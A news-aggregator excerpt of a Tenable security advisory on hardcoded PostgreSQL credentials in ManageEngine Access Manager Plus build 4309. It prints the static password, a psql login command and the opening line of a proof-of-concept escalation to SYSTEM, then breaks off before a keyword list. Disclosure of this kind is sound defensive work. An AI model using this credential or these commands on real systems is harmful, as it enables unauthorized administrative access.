all InfoSec news
Zoho ManageEngine Disclosure of Hardcoded Credentials
Tenable Research Advisories www.tenable.com
Static credentials exist in the PostgreSQL data used in ManageEngine Access Manager Plus (AMP) build 4309. These credentials could allow a malicious actor to modify configuration data that would escalate their permissions from that of a low-privileged user to an Administrative user.
The PostgreSQL database server used in AMP is run under the SYSTEM account:C:\Program Files\ManageEngine\AMP\pgsql\bin>set PGPASSWORD=Stonebraker&& psql -h 127.0.0.1 -p 4567 -d AMP -U postgres -q
AMP=# DROP TABLE IF EXISTS cmd_exec; …
access actor amp build configuration credentials data database disclosure hardcoded hardcoded credentials low malicious manageengine manager permissions postgresql privileged privileged user server zoho zoho manageengine